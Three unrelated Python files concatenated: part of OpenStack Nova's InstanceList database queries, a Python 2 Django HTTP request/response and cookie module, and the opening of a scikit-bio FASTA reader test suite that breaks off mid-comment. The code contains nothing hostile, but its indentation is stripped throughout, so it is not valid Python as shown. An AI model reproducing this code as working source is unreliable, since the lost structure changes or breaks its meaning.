columns_to_join=_expected_cols(expected_attrs),
use_slave=use_slave, sort_keys=sort_keys, sort_dirs=sort_dirs)
else:
db_inst_list = db.instance_get_all_by_filters(
context, filters, sort_key, sort_dir, limit=limit,
marker=marker, columns_to_join=_expected_cols(expected_attrs),
use_slave=use_slave)
return _make_instance_list(context, cls(), db_inst_list,
expected_attrs)
@base.remotable_classmethod
def get_by_host(cls, context, host, expected_attrs=None, use_slave=False):
db_inst_list = db.instance_get_all_by_host(
context, host, columns_to_join=_expected_cols(expected_attrs),
use_slave=use_slave)
return _make_instance_list(context, cls(), db_inst_list,
expected_attrs)
@base.remotable_classmethod
def get_by_host_and_node(cls, context, host, node, expected_attrs=None):
db_inst_list = db.instance_get_all_by_host_and_node(
context, host, node,
columns_to_join=_expected_cols(expected_attrs))
return _make_instance_list(context, cls(), db_inst_list,
expected_attrs)
@base.remotable_classmethod
def get_by_host_and_not_type(cls, context, host, type_id=None,
expected_attrs=None):
db_inst_list = db.instance_get_all_by_host_and_not_type(
context, host, type_id=type_id)
return _make_instance_list(context, cls(), db_inst_list,
expected_attrs)
@base.remotable_classmethod
def get_all(cls, context, expected_attrs=None):
"""Returns all instances on all nodes."""
db_instances = db.instance_get_all(
context, columns_to_join=_expected_cols(expected_attrs))
return _make_instance_list(context, cls(), db_instances,
expected_attrs)
@base.remotable_classmethod
def get_hung_in_rebooting(cls, context, reboot_window,
expected_attrs=None):
db_inst_list = db.instance_get_all_hung_in_rebooting(context,
reboot_window)
return _make_instance_list(context, cls(), db_inst_list,
expected_attrs)
@base.remotable_classmethod
def _get_active_by_window_joined(cls, context, begin, end=None,
project_id=None, host=None,
expected_attrs=None,
use_slave=False):
# NOTE(mriedem): We need to convert the begin/end timestamp strings
# to timezone-aware datetime objects for the DB API call.
begin = timeutils.parse_isotime(begin)
end = timeutils.parse_isotime(end) if end else None
db_inst_list = db.instance_get_active_by_window_joined(
context, begin, end, project_id, host,
columns_to_join=_expected_cols(expected_attrs))
return _make_instance_list(context, cls(), db_inst_list,
expected_attrs)
@classmethod
def get_active_by_window_joined(cls, context, begin, end=None,
project_id=None, host=None,
expected_attrs=None,
use_slave=False):
"""Get instances and joins active during a certain time window.
:param:context: nova request context
:param:begin: datetime for the start of the time window
:param:end: datetime for the end of the time window
:param:project_id: used to filter instances by project
:param:host: used to filter instances on a given compute host
:param:expected_attrs: list of related fields that can be joined
in the database layer when querying for instances
:param use_slave if True, ship this query off to a DB slave
:returns: InstanceList
"""
# NOTE(mriedem): We have to convert the datetime objects to string
# primitives for the remote call.
begin = utils.isotime(begin)
end = utils.isotime(end) if end else None
return cls._get_active_by_window_joined(context, begin, end,
project_id, host,
expected_attrs,
use_slave=use_slave)
@base.remotable_classmethod
def get_by_security_group_id(cls, context, security_group_id):
db_secgroup = db.security_group_get(
context, security_group_id,
columns_to_join=['instances.info_cache',
'instances.system_metadata'])
return _make_instance_list(context, cls(), db_secgroup['instances'],
['info_cache', 'system_metadata'])
@classmethod
def get_by_security_group(cls, context, security_group):
return cls.get_by_security_group_id(context, security_group.id)
@base.remotable_classmethod
def get_by_grantee_security_group_ids(cls, context, security_group_ids):
db_instances = db.instance_get_all_by_grantee_security_groups(
context, security_group_ids)
return _make_instance_list(context, cls(), db_instances, [])
def fill_faults(self):
"""Batch query the database for our instances' faults.
:returns: A list of instance uuids for which faults were found.
"""
uuids = [inst.uuid for inst in self]
faults = objects.InstanceFaultList.get_by_instance_uuids(
self._context, uuids)
faults_by_uuid = {}
for fault in faults:
if fault.instance_uuid not in faults_by_uuid:
faults_by_uuid[fault.instance_uuid] = fault
for instance in self:
if instance.uuid in faults_by_uuid:
instance.fault = faults_by_uuid[instance.uuid]
else:
# NOTE(danms): Otherwise the caller will cause a lazy-load
# when checking it, and we know there are none
instance.fault = None
instance.obj_reset_changes(['fault'])
return faults_by_uuid.keys()
| |
from __future__ import absolute_import
import datetime
import os
import re
import sys
import time
import warnings
from pprint import pformat
from urllib import urlencode, quote
from urlparse import urljoin
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
# The mod_python version is more efficient, so try importing it first.
from mod_python.util import parse_qsl
except ImportError:
try:
# Python 2.6 and greater
from urlparse import parse_qsl
except ImportError:
# Python 2.5. Works on Python 2.6 but raises PendingDeprecationWarning
from cgi import parse_qsl
import Cookie
# httponly support exists in Python 2.6's Cookie library,
# but not in Python 2.5.
_morsel_supports_httponly = 'httponly' in Cookie.Morsel._reserved
# Some versions of Python 2.7 and later won't need this encoding bug fix:
_cookie_encodes_correctly = Cookie.SimpleCookie().value_encode(';') == (';', '"\\073"')
# See ticket #13007, http://bugs.python.org/issue2193 and http://trac.edgewall.org/ticket/2256
_tc = Cookie.SimpleCookie()
try:
_tc.load('foo:bar=1')
_cookie_allows_colon_in_names = True
except Cookie.CookieError:
_cookie_allows_colon_in_names = False
if _morsel_supports_httponly and _cookie_encodes_correctly and _cookie_allows_colon_in_names:
SimpleCookie = Cookie.SimpleCookie
else:
if not _morsel_supports_httponly:
class Morsel(Cookie.Morsel):
def __setitem__(self, K, V):
K = K.lower()
if K == "httponly":
if V:
# The superclass rejects httponly as a key,
# so we jump to the grandparent.
super(Cookie.Morsel, self).__setitem__(K, V)
else:
super(Morsel, self).__setitem__(K, V)
def OutputString(self, attrs=None):
output = super(Morsel, self).OutputString(attrs)
if "httponly" in self:
output += "; httponly"
return output
else:
Morsel = Cookie.Morsel
class SimpleCookie(Cookie.SimpleCookie):
if not _cookie_encodes_correctly:
def value_encode(self, val):
# Some browsers do not support quoted-string from RFC 2109,
# including some versions of Safari and Internet Explorer.
# These browsers split on ';', and some versions of Safari
# are known to split on ', '. Therefore, we encode ';' and ','
# SimpleCookie already does the hard work of encoding and decoding.
# It uses octal sequences like '\\012' for newline etc.
# and non-ASCII chars. We just make use of this mechanism, to
# avoid introducing two encoding schemes which would be confusing
# and especially awkward for javascript.
# NB, contrary to Python docs, value_encode returns a tuple containing
# (real val, encoded_val)
val, encoded = super(SimpleCookie, self).value_encode(val)
encoded = encoded.replace(";", "\\073").replace(",","\\054")
# If encoded now contains any quoted chars, we need double quotes
# around the whole string.
if "\\" in encoded and not encoded.startswith('"'):
encoded = '"' + encoded + '"'
return val, encoded
if not _cookie_allows_colon_in_names or not _morsel_supports_httponly:
def load(self, rawdata):
self.bad_cookies = set()
super(SimpleCookie, self).load(rawdata)
for key in self.bad_cookies:
del self[key]
# override private __set() method:
# (needed for using our Morsel, and for laxness with CookieError
def _BaseCookie__set(self, key, real_value, coded_value):
try:
M = self.get(key, Morsel())
M.set(key, real_value, coded_value)
dict.__setitem__(self, key, M)
except Cookie.CookieError:
self.bad_cookies.add(key)
dict.__setitem__(self, key, Cookie.Morsel())
class CompatCookie(SimpleCookie):
def __init__(self, *args, **kwargs):
super(CompatCookie, self).__init__(*args, **kwargs)
import warnings
warnings.warn("CompatCookie is deprecated. Use django.http.SimpleCookie instead.", DeprecationWarning)
from django.conf import settings
from django.core import signing
from django.core.exceptions import ImproperlyConfigured
from django.core.files import uploadhandler
from django.http.multipartparser import MultiPartParser
from django.http.utils import *
from django.utils.datastructures import MultiValueDict, ImmutableList
from django.utils.encoding import smart_str, iri_to_uri, force_unicode
from django.utils.http import cookie_date
RESERVED_CHARS="!*'();:@&=+$,/?%#[]"
absolute_http_url_re = re.compile(r"^https?://", re.I)
class Http404(Exception):
pass
RAISE_ERROR = object()
def build_request_repr(request, path_override=None, GET_override=None,
POST_override=None, COOKIES_override=None,
META_override=None):
"""
Builds and returns the request's representation string. The request's
attributes may be overridden by pre-processed values.
"""
# Since this is called as part of error handling, we need to be very
# robust against potentially malformed input.
try:
get = (pformat(GET_override)
if GET_override is not None
else pformat(request.GET))
except:
get = '<could not parse>'
if request._post_parse_error:
post = '<could not parse>'
else:
try:
post = (pformat(POST_override)
if POST_override is not None
else pformat(request.POST))
except:
post = '<could not parse>'
try:
cookies = (pformat(COOKIES_override)
if COOKIES_override is not None
else pformat(request.COOKIES))
except:
cookies = '<could not parse>'
try:
meta = (pformat(META_override)
if META_override is not None
else pformat(request.META))
except:
meta = '<could not parse>'
path = path_override if path_override is not None else request.path
return smart_str(u'<%s\npath:%s,\nGET:%s,\nPOST:%s,\nCOOKIES:%s,\nMETA:%s>' %
(request.__class__.__name__,
path,
unicode(get),
unicode(post),
unicode(cookies),
unicode(meta)))
class UnreadablePostError(IOError):
pass
class HttpRequest(object):
"""A basic HTTP request."""
# The encoding used in GET/POST dicts. None means use default setting.
_encoding = None
_upload_handlers = []
def __init__(self):
self.GET, self.POST, self.COOKIES, self.META, self.FILES = {}, {}, {}, {}, {}
self.path = ''
self.path_info = ''
self.method = None
self._post_parse_error = False
def __repr__(self):
return build_request_repr(self)
def get_host(self):
"""Returns the HTTP host using the environment or request headers."""
# We try three options, in order of decreasing preference.
if settings.USE_X_FORWARDED_HOST and (
'HTTP_X_FORWARDED_HOST' in self.META):
host = self.META['HTTP_X_FORWARDED_HOST']
elif 'HTTP_HOST' in self.META:
host = self.META['HTTP_HOST']
else:
# Reconstruct the host using the algorithm from PEP 333.
host = self.META['SERVER_NAME']
server_port = str(self.META['SERVER_PORT'])
if server_port != (self.is_secure() and '443' or '80'):
host = '%s:%s' % (host, server_port)
return host
def get_full_path(self):
# RFC 3986 requires query string arguments to be in the ASCII range.
# Rather than crash if this doesn't happen, we encode defensively.
return '%s%s' % (self.path, self.META.get('QUERY_STRING', '') and ('?' + iri_to_uri(self.META.get('QUERY_STRING', ''))) or '')
def get_signed_cookie(self, key, default=RAISE_ERROR, salt='', max_age=None):
"""
Attempts to return a signed cookie. If the signature fails or the
cookie has expired, raises an exception... unless you provide the
default argument in which case that value will be returned instead.
"""
try:
cookie_value = self.COOKIES[key].encode('utf-8')
except KeyError:
if default is not RAISE_ERROR:
return default
else:
raise
try:
value = signing.get_cookie_signer(salt=key + salt).unsign(
cookie_value, max_age=max_age)
except signing.BadSignature:
if default is not RAISE_ERROR:
return default
else:
raise
return value
def build_absolute_uri(self, location=None):
"""
Builds an absolute URI from the location and the variables available in
this request. If no location is specified, the absolute URI is built on
``request.get_full_path()``.
"""
if not location:
location = self.get_full_path()
if not absolute_http_url_re.match(location):
current_uri = '%s://%s%s' % (self.is_secure() and 'https' or 'http',
self.get_host(), self.path)
location = urljoin(current_uri, location)
return iri_to_uri(location)
def _is_secure(self):
return os.environ.get("HTTPS") == "on"
def is_secure(self):
# First, check the SECURE_PROXY_SSL_HEADER setting.
if settings.SECURE_PROXY_SSL_HEADER:
try:
header, value = settings.SECURE_PROXY_SSL_HEADER
except ValueError:
raise ImproperlyConfigured('The SECURE_PROXY_SSL_HEADER setting must be a tuple containing two values.')
if self.META.get(header, None) == value:
return True
# Failing that, fall back to _is_secure(), which is a hook for
# subclasses to implement.
return self._is_secure()
def is_ajax(self):
return self.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest'
def _set_encoding(self, val):
"""
Sets the encoding used for GET/POST accesses. If the GET or POST
dictionary has already been created, it is removed and recreated on the
next access (so that it is decoded correctly).
"""
self._encoding = val
if hasattr(self, '_get'):
del self._get
if hasattr(self, '_post'):
del self._post
def _get_encoding(self):
return self._encoding
encoding = property(_get_encoding, _set_encoding)
def _initialize_handlers(self):
self._upload_handlers = [uploadhandler.load_handler(handler, self)
for handler in settings.FILE_UPLOAD_HANDLERS]
def _set_upload_handlers(self, upload_handlers):
if hasattr(self, '_files'):
raise AttributeError("You cannot set the upload handlers after the upload has been processed.")
self._upload_handlers = upload_handlers
def _get_upload_handlers(self):
if not self._upload_handlers:
# If there are no upload handlers defined, initialize them from settings.
self._initialize_handlers()
return self._upload_handlers
upload_handlers = property(_get_upload_handlers, _set_upload_handlers)
def parse_file_upload(self, META, post_data):
"""Returns a tuple of (POST QueryDict, FILES MultiValueDict)."""
self.upload_handlers = ImmutableList(
self.upload_handlers,
warning = "You cannot alter upload handlers after the upload has been processed."
)
parser = MultiPartParser(META, post_data, self.upload_handlers, self.encoding)
return parser.parse()
@property
def body(self):
if not hasattr(self, '_body'):
if self._read_started:
raise Exception("You cannot access body after reading from request's data stream")
try:
self._body = self.read()
except IOError, e:
raise UnreadablePostError, e, sys.exc_traceback
self._stream = StringIO(self._body)
return self._body
@property
def raw_post_data(self):
warnings.warn('HttpRequest.raw_post_data has been deprecated. Use HttpRequest.body instead.', PendingDeprecationWarning)
return self.body
def _mark_post_parse_error(self):
self._post = QueryDict('')
self._files = MultiValueDict()
self._post_parse_error = True
def _load_post_and_files(self):
# Populates self._post and self._files
if self.method != 'POST':
self._post, self._files = QueryDict('', encoding=self._encoding), MultiValueDict()
return
if self._read_started and not hasattr(self, '_body'):
self._mark_post_parse_error()
return
if self.META.get('CONTENT_TYPE', '').startswith('multipart'):
if hasattr(self, '_body'):
# Use already read data
data = StringIO(self._body)
else:
data = self
try:
self._post, self._files = self.parse_file_upload(self.META, data)
except:
# An error occured while parsing POST data. Since when
# formatting the error the request handler might access
# self.POST, set self._post and self._file to prevent
# attempts to parse POST data again.
# Mark that an error occured. This allows self.__repr__ to
# be explicit about it instead of simply representing an
# empty POST
self._mark_post_parse_error()
raise
else:
self._post, self._files = QueryDict(self.body, encoding=self._encoding), MultiValueDict()
## File-like and iterator interface.
##
## Expects self._stream to be set to an appropriate source of bytes by
## a corresponding request subclass (WSGIRequest or ModPythonRequest).
## Also when request data has already been read by request.POST or
## request.body, self._stream points to a StringIO instance
## containing that data.
def read(self, *args, **kwargs):
self._read_started = True
return self._stream.read(*args, **kwargs)
def readline(self, *args, **kwargs):
self._read_started = True
return self._stream.readline(*args, **kwargs)
def xreadlines(self):
while True:
buf = self.readline()
if not buf:
break
yield buf
__iter__ = xreadlines
def readlines(self):
return list(iter(self))
class QueryDict(MultiValueDict):
"""
A specialized MultiValueDict that takes a query string when initialized.
This is immutable unless you create a copy of it.
Values retrieved from this class are converted from the given encoding
(DEFAULT_CHARSET by default) to unicode.
"""
# These are both reset in __init__, but is specified here at the class
# level so that unpickling will have valid values
_mutable = True
_encoding = None
def __init__(self, query_string, mutable=False, encoding=None):
MultiValueDict.__init__(self)
if not encoding:
encoding = settings.DEFAULT_CHARSET
self.encoding = encoding
for key, value in parse_qsl((query_string or ''), True): # keep_blank_values=True
self.appendlist(force_unicode(key, encoding, errors='replace'),
force_unicode(value, encoding, errors='replace'))
self._mutable = mutable
def _get_encoding(self):
if self._encoding is None:
self._encoding = settings.DEFAULT_CHARSET
return self._encoding
def _set_encoding(self, value):
self._encoding = value
encoding = property(_get_encoding, _set_encoding)
def _assert_mutable(self):
if not self._mutable:
raise AttributeError("This QueryDict instance is immutable")
def __setitem__(self, key, value):
self._assert_mutable()
key = str_to_unicode(key, self.encoding)
value = str_to_unicode(value, self.encoding)
MultiValueDict.__setitem__(self, key, value)
def __delitem__(self, key):
self._assert_mutable()
super(QueryDict, self).__delitem__(key)
def __copy__(self):
result = self.__class__('', mutable=True, encoding=self.encoding)
for key, value in dict.items(self):
dict.__setitem__(result, key, value)
return result
def __deepcopy__(self, memo):
import copy
result = self.__class__('', mutable=True, encoding=self.encoding)
memo[id(self)] = result
for key, value in dict.items(self):
dict.__setitem__(result, copy.deepcopy(key, memo), copy.deepcopy(value, memo))
return result
def setlist(self, key, list_):
self._assert_mutable()
key = str_to_unicode(key, self.encoding)
list_ = [str_to_unicode(elt, self.encoding) for elt in list_]
MultiValueDict.setlist(self, key, list_)
def setlistdefault(self, key, default_list=()):
self._assert_mutable()
if key not in self:
self.setlist(key, default_list)
return MultiValueDict.getlist(self, key)
def appendlist(self, key, value):
self._assert_mutable()
key = str_to_unicode(key, self.encoding)
value = str_to_unicode(value, self.encoding)
MultiValueDict.appendlist(self, key, value)
def update(self, other_dict):
self._assert_mutable()
f = lambda s: str_to_unicode(s, self.encoding)
if hasattr(other_dict, 'lists'):
for key, valuelist in other_dict.lists():
for value in valuelist:
MultiValueDict.update(self, {f(key): f(value)})
else:
d = dict([(f(k), f(v)) for k, v in other_dict.items()])
MultiValueDict.update(self, d)
def pop(self, key, *args):
self._assert_mutable()
return MultiValueDict.pop(self, key, *args)
def popitem(self):
self._assert_mutable()
return MultiValueDict.popitem(self)
def clear(self):
self._assert_mutable()
MultiValueDict.clear(self)
def setdefault(self, key, default=None):
self._assert_mutable()
key = str_to_unicode(key, self.encoding)
default = str_to_unicode(default, self.encoding)
return MultiValueDict.setdefault(self, key, default)
def copy(self):
"""Returns a mutable copy of this object."""
return self.__deepcopy__({})
def urlencode(self, safe=None):
"""
Returns an encoded string of all query string arguments.
:arg safe: Used to specify characters which do not require quoting, for
example::
>>> q = QueryDict('', mutable=True)
>>> q['next'] = '/a&b/'
>>> q.urlencode()
'next=%2Fa%26b%2F'
>>> q.urlencode(safe='/')
'next=/a%26b/'
"""
output = []
if safe:
encode = lambda k, v: '%s=%s' % ((quote(k, safe), quote(v, safe)))
else:
encode = lambda k, v: urlencode({k: v})
for k, list_ in self.lists():
k = smart_str(k, self.encoding)
output.extend([encode(k, smart_str(v, self.encoding))
for v in list_])
return '&'.join(output)
def parse_cookie(cookie):
if cookie == '':
return {}
if not isinstance(cookie, Cookie.BaseCookie):
try:
c = SimpleCookie()
c.load(cookie)
except Cookie.CookieError:
# Invalid cookie
return {}
else:
c = cookie
cookiedict = {}
for key in c.keys():
cookiedict[key] = c.get(key).value
return cookiedict
class BadHeaderError(ValueError):
pass
class HttpResponse(object):
"""A basic HTTP response, with content and dictionary-accessed headers."""
status_code = 200
def __init__(self, content='', mimetype=None, status=None,
content_type=None):
# _headers is a mapping of the lower-case name to the original case of
# the header (required for working with legacy systems) and the header
# value. Both the name of the header and its value are ASCII strings.
self._headers = {}
self._charset = settings.DEFAULT_CHARSET
if mimetype: # For backwards compatibility.
content_type = mimetype
if not content_type:
content_type = "%s; charset=%s" % (settings.DEFAULT_CONTENT_TYPE,
self._charset)
self.content = content
self.cookies = SimpleCookie()
if status:
self.status_code = status
self['Content-Type'] = content_type
def __str__(self):
"""Full HTTP message, including headers."""
return '\n'.join(['%s: %s' % (key, value)
for key, value in self._headers.values()]) \
+ '\n\n' + self.content
def _convert_to_ascii(self, *values):
"""Converts all values to ascii strings."""
for value in values:
if isinstance(value, unicode):
try:
value = value.encode('us-ascii')
except UnicodeError, e:
e.reason += ', HTTP response headers must be in US-ASCII format'
raise
else:
value = str(value)
if '\n' in value or '\r' in value:
raise BadHeaderError("Header values can't contain newlines (got %r)" % (value))
yield value
def __setitem__(self, header, value):
header, value = self._convert_to_ascii(header, value)
self._headers[header.lower()] = (header, value)
def __delitem__(self, header):
try:
del self._headers[header.lower()]
except KeyError:
pass
def __getitem__(self, header):
return self._headers[header.lower()][1]
def __getstate__(self):
# SimpleCookie is not pickeable with pickle.HIGHEST_PROTOCOL, so we
# serialise to a string instead
state = self.__dict__.copy()
state['cookies'] = str(state['cookies'])
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.cookies = SimpleCookie(self.cookies)
def has_header(self, header):
"""Case-insensitive check for a header."""
return header.lower() in self._headers
__contains__ = has_header
def items(self):
return self._headers.values()
def get(self, header, alternate=None):
return self._headers.get(header.lower(), (None, alternate))[1]
def set_cookie(self, key, value='', max_age=None, expires=None, path='/',
domain=None, secure=False, httponly=False):
"""
Sets a cookie.
``expires`` can be a string in the correct format or a
``datetime.datetime`` object in UTC. If ``expires`` is a datetime
object then ``max_age`` will be calculated.
"""
self.cookies[key] = value
if expires is not None:
if isinstance(expires, datetime.datetime):
delta = expires - expires.utcnow()
# Add one second so the date matches exactly (a fraction of
# time gets lost between converting to a timedelta and
# then the date string).
delta = delta + datetime.timedelta(seconds=1)
# Just set max_age - the max_age logic will set expires.
expires = None
max_age = max(0, delta.days * 86400 + delta.seconds)
else:
self.cookies[key]['expires'] = expires
if max_age is not None:
self.cookies[key]['max-age'] = max_age
# IE requires expires, so set it if hasn't been already.
if not expires:
self.cookies[key]['expires'] = cookie_date(time.time() +
max_age)
if path is not None:
self.cookies[key]['path'] = path
if domain is not None:
self.cookies[key]['domain'] = domain
if secure:
self.cookies[key]['secure'] = True
if httponly:
self.cookies[key]['httponly'] = True
def set_signed_cookie(self, key, value, salt='', **kwargs):
value = signing.get_cookie_signer(salt=key + salt).sign(value)
return self.set_cookie(key, value, **kwargs)
def delete_cookie(self, key, path='/', domain=None):
self.set_cookie(key, max_age=0, path=path, domain=domain,
expires='Thu, 01-Jan-1970 00:00:00 GMT')
def _get_content(self):
if self.has_header('Content-Encoding'):
return ''.join([str(e) for e in self._container])
return ''.join([smart_str(e, self._charset) for e in self._container])
def _set_content(self, value):
if hasattr(value, '__iter__'):
self._container = value
self._base_content_is_iter = True
else:
self._container = [value]
self._base_content_is_iter = False
content = property(_get_content, _set_content)
def __iter__(self):
self._iterator = iter(self._container)
return self
def next(self):
chunk = self._iterator.next()
if isinstance(chunk, unicode):
chunk = chunk.encode(self._charset)
return str(chunk)
def close(self):
if hasattr(self._container, 'close'):
self._container.close()
# The remaining methods partially implement the file-like object interface.
# See http://docs.python.org/lib/bltin-file-objects.html
def write(self, content):
if self._base_content_is_iter:
raise Exception("This %s instance is not writable" % self.__class__)
self._container.append(content)
def flush(self):
pass
def tell(self):
if self._base_content_is_iter:
raise Exception("This %s instance cannot tell its position" % self.__class__)
return sum([len(str(chunk)) for chunk in self._container])
class HttpResponseRedirect(HttpResponse):
status_code = 302
def __init__(self, redirect_to):
super(HttpResponseRedirect, self).__init__()
self['Location'] = iri_to_uri(redirect_to)
class HttpResponsePermanentRedirect(HttpResponse):
status_code = 301
def __init__(self, redirect_to):
super(HttpResponsePermanentRedirect, self).__init__()
self['Location'] = iri_to_uri(redirect_to)
class HttpResponseNotModified(HttpResponse):
status_code = 304
class HttpResponseBadRequest(HttpResponse):
status_code = 400
class HttpResponseNotFound(HttpResponse):
status_code = 404
class HttpResponseForbidden(HttpResponse):
status_code = 403
class HttpResponseNotAllowed(HttpResponse):
status_code = 405
def __init__(self, permitted_methods):
super(HttpResponseNotAllowed, self).__init__()
self['Allow'] = ', '.join(permitted_methods)
class HttpResponseGone(HttpResponse):
status_code = 410
class HttpResponseServerError(HttpResponse):
status_code = 500
# A backwards compatible alias for HttpRequest.get_host.
def get_host(request):
return request.get_host()
# It's neither necessary nor appropriate to use
# django.utils.encoding.smart_unicode for parsing URLs and form inputs. Thus,
# this slightly more restricted function.
def str_to_unicode(s, encoding):
"""
Converts basestring objects to unicode, using the given encoding. Illegally
encoded input characters are replaced with Unicode "unknown" codepoint
(\ufffd).
Returns any non-basestring objects without change.
"""
if isinstance(s, str):
return unicode(s, encoding, 'replace')
else:
return s
| |
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
from future.builtins import map, range, zip
import six
import io
from unittest import TestCase, main
from functools import partial
import numpy as np
from skbio import (Sequence, DNA, RNA, Protein, SequenceCollection, Alignment)
from skbio.io import FASTAFormatError, QUALFormatError
from skbio.io.format.fasta import (
_fasta_sniffer, _fasta_to_generator, _fasta_to_biological_sequence,
_fasta_to_dna_sequence, _fasta_to_rna_sequence, _fasta_to_protein_sequence,
_fasta_to_sequence_collection, _fasta_to_alignment, _generator_to_fasta,
_biological_sequence_to_fasta, _dna_sequence_to_fasta,
_rna_sequence_to_fasta, _protein_sequence_to_fasta,
_sequence_collection_to_fasta, _alignment_to_fasta)
from skbio.util import get_data_path
class SnifferTests(TestCase):
def setUp(self):
self.positive_fps = list(map(get_data_path, [
'fasta_5_blanks_start_of_file',
'fasta_5_ws_lines_start_of_file',
'fasta_blanks_end_of_file',
'fasta_ws_lines_end_of_file',
'fasta_blank_lines_between_records',
'fasta_3_seqs_defaults',
'fasta_max_width_1',
'fasta_single_bio_seq_non_defaults',
'fasta_single_prot_seq_non_defaults',
'fasta_3_seqs_non_defaults',
'fasta_max_width_5',
'fasta_single_dna_seq_defaults',
'fasta_single_rna_seq_defaults',
'fasta_description_newline_replacement_empty_str',
'fasta_multi_seq',
'fasta_single_dna_seq_non_defaults',
'fasta_single_rna_seq_non_defaults',
'fasta_description_newline_replacement_multi_char',
'fasta_prot_seqs_odd_labels',
'fasta_single_seq',
'fasta_id_whitespace_replacement_empty_str',
'fasta_sequence_collection_different_type',
'fasta_id_whitespace_replacement_multi_char',
'fasta_single_bio_seq_defaults',
'fasta_single_prot_seq_defaults',
'fasta_10_seqs',
'fasta_invalid_after_10_seqs',
'fasta_mixed_qual_scores',
'qual_3_seqs_non_defaults'
]))
self.negative_fps = list(map(get_data_path, [
'empty',
'whitespace_only',
'fasta_invalid_missing_header',
'fasta_invalid_blank_line_after_header',
'fasta_invalid_blank_sequence',
'fasta_invalid_blank_line_within_sequence',
'fasta_invalid_whitespace_only_line_within_sequence',
'fasta_invalid_whitespace_line_after_header',
'fasta_invalid_missing_seq_data_first',
'fasta_invalid_missing_seq_data_middle',
'fasta_invalid_missing_seq_data_last',
'fasta_invalid_legacy_format',
'fasta_invalid_whitespace_only_sequence',
'fasta_id_whitespace_replacement_none',
'fasta_description_newline_replacement_none',
'fasta_6_blanks_start_of_file',
'fasta_6_ws_lines_start_of_file',
'qual_2_seqs_defaults',
'qual_3_seqs_defaults',
'qual_3_seqs_defaults_desc_mismatch',
'qual_3_seqs_defaults_extra',
'qual_3_seqs_defaults_id_mismatch',
'qual_3_seqs_defaults_length_mismatch',
'qual_description_newline_replacement_empty_str',
'qual_description_newline_replacement_multi_char',
'qual_description_newline_replacement_none',
'qual_id_whitespace_replacement_empty_str',
'qual_id_whitespace_replacement_multi_char',
'qual_id_whitespace_replacement_none',
'qual_invalid_blank_line_within_seq',
'qual_invalid_legacy_format',
'qual_invalid_missing_header',
'qual_invalid_missing_qual_scores_first',
'qual_invalid_missing_qual_scores_last',
'qual_invalid_missing_qual_scores_middle',
'qual_invalid_whitespace_line_in_seq',
'qual_invalid_blank_line_after_header',
'qual_invalid_blank_sequence',
'qual_invalid_whitespace_only_sequence',
'qual_invalid_ws_line_after_header',
'qual_invalid_qual_scores_float',
'qual_invalid_qual_scores_string',
'qual_max_width_1',
'qual_max_width_5',
'qual_multi_seq',
'qual_multi_seq_roundtrip',
'qual_prot_seqs_odd_labels',
'qual_sequence_collection_different_type',
'qual_single_bio_seq_non_defaults',
'qual_single_dna_seq_non_defaults',
'qual_single_prot_seq_non_defaults',
'qual_single_rna_seq_non_defaults',
'qual_single_seq',
'qual_ws_lines_between_records',
'qual_blank_lines_between_records',
'qual_5_blanks_start_of_file',
'qual_5_ws_lines_start_of_file',
'qual_6_blanks_start_of_file',
'qual_6_ws_lines_start_of_file',
'qual_blanks_end_of_file',
'qual_ws_lines_end_of_file'
]))
def test_positives(self):
for fp in self.positive_fps:
self.assertEqual(_fasta_sniffer(fp), (True, {}))
def test_negatives(self):
for fp in self.negative_fps:
self.assertEqual(_fasta_sniffer(fp), (False, {}))
class ReaderTests(TestCase):
def setUp(self):
# each structure stores the sequence generator results (expanded into a
# list) that we expect to obtain from reading, matched with kwargs to
# pass to the reader, and fasta and qual filepaths that should
# deserialize into the expected generator results
# empty file shouldn't yield sequences
self.empty = ([], {}, list(map(get_data_path, ['empty',
'whitespace_only'])),
list(map(get_data_path, ['empty', 'whitespace_only'])))
# single sequence
self.single = (
[Sequence(
'ACGT-acgt.', metadata={'id': 'seq1', 'description': 'desc1'},
positional_metadata={'quality':
np.asarray([10, 20, 30, 10, 0, 0, 0, 255,
1, 255], dtype=np.uint8)})],
{},
list(map(get_data_path, ['fasta_single_seq',
'fasta_max_width_1'])),
list(map(get_data_path, ['qual_single_seq', 'qual_max_width_1']))
)
# multiple sequences
self.multi = (
[Sequence(
'ACGT-acgt.', metadata={'id': 'seq1', 'description': 'desc1'},
positional_metadata={'quality':
np.asarray([10, 20, 30, 10, 0, 0, 0, 255,
1, 255], dtype=np.uint8)}),
Sequence('A', metadata={'id': '_____seq__2_', 'description': ''},
positional_metadata={'quality':
np.asarray([42], dtype=np.uint8)}),
Sequence(
'AACGGuA', metadata={'id': '', 'description': 'desc3'},
positional_metadata={'quality':
np.asarray([0, 0, 0, 0, 0, 0, 0],
dtype=np.uint8)}),
Sequence(
'ACGTTGCAccGG',
metadata={'id': '', 'description': ''},
positional_metadata={'quality':
np.asarray([55, 10, 0, 99, 1, 1, 8, 77,
40, 10, 10, 0],
dtype=np.uint8)}),
Sequence('ACGUU',
metadata={'id': '', 'description': ''},
positional_metadata={'quality':
np.asarray([10, 9, 8, 7, 6],
dtype=np.uint8)}),
Sequence(
'pQqqqPPQQQ',
metadata={'id': 'proteinseq',
'description':
'detailed description \t\twith new lines'},
positional_metadata={'quality':
np.asarray([42, 42, 255, 255, 42, 42, 42,
42, 42, 43],
dtype=np.uint8)})],
{},
list(map(get_data_path, ['fasta_multi_seq', 'fasta_max_width_5',
'fasta_blank_lines_between_records',
'fasta_ws_lines_between_records',
'fasta_5_blanks_start_of_file',
'fasta_5_ws_lines_start_of_file',
'fasta_6_blanks_start_of_file',
'fasta_6_ws_lines_start_of_file',
'fasta_blanks_end_of_file',
'fasta_ws_lines_end_of_file'])),
list(map(get_data_path, ['qual_multi_seq', 'qual_max_width_5',
'qual_blank_lines_between_records',
'qual_ws_lines_between_records',
'qual_5_blanks_start_of_file',
'qual_5_ws_lines_start_of_file',
'qual_6_blanks_start_of_file',
'qual_6_ws_lines_start_of_file',
'qual_blanks_end_of_file',
'qual_ws_lines_end_of_file']))
)
# test constructor parameter, as well as odd labels (label only
# containing whitespace, label description preceded by multiple spaces,
# no id) and leading/trailing whitespace on sequence data. for qual
# files, in addition to the odd labels, test leading/trailing
# whitespace on qual scores, as well as strange number formatting.
